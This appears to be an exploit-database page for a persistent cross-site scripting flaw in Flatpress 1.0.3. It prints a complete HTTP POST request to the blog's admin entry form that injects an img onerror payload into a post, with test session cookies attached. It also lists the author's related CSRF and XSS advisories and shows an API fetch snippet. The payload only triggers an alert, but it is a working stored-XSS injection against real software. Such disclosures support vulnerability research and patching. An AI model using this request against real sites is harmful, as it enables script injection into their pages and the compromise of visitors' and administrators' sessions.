Become a patron and gain access to the dashboard, Schedule scans, API and Search patron
Author
"Alperen Ergel"
Platform
php
Release date
2020-09-22
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 | # Exploit Title: Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting # Google Dork: - # Date: 2020-09-19 # Exploit Author: Alperen Ergel # Vendor Homepage: https://www.flatpress.org/ # Software Link: https://github.com/evacchi/flatpress/releases/tag/v1.0.3 # Version: 1.0.3 # Tested on: windows 10 / xampp # CVE : - # Proof Of Content POST /flatpress/admin.php?p=entry&action=write HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 223 Origin: http://localhost/ Connection: close Referer: http://localhost/flatpress/admin.php?p=entry&action=write Cookie: fpuser_fp-a53f4609=opensourcecms; fppass_fp-a53f4609=79dc9a3c529fcd0d9dc4fc7ff22187b6; fpsess_fp-a53f4609=71v18tu3lsc0s021q2pj8a3je7; _ga=GA1.2.487908813.1600520069; _gid=GA1.2.951134816.1600520069; _gat=1 Upgrade-Insecure-Requests: 1 _wpnonce=4fc4222db1&_wp_http_referer=%2Fflatpress%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=XSS×tamp=1600526382& entry=entry200919-143942&attachselect=--&imageselect=--&content=<img src=x onerror='alert("TEST XSS")'/>&savecontinue=Save%26Continue # Snipp content=[PAYLOAD] //<img src=x onerror='alert("TEST XSS")'/> |
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2020-12-01 | "TypeSetter 5.1 - CSRF (Change admin e-mail)" | webapps | php | "Alperen Ergel" |
2020-10-19 | "Textpattern CMS 4.6.2 - Cross-site Request Forgery" | webapps | php | "Alperen Ergel" |
2020-10-07 | "Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting" | webapps | php | "Alperen Ergel" |
2020-10-01 | "Typesetter CMS 5.1 - 'Site Title' Persistent Cross-Site Scripting" | webapps | php | "Alperen Ergel" |
2020-09-22 | "Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting" | webapps | php | "Alperen Ergel" |
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48826/?format=json')
For full documentation follow the link above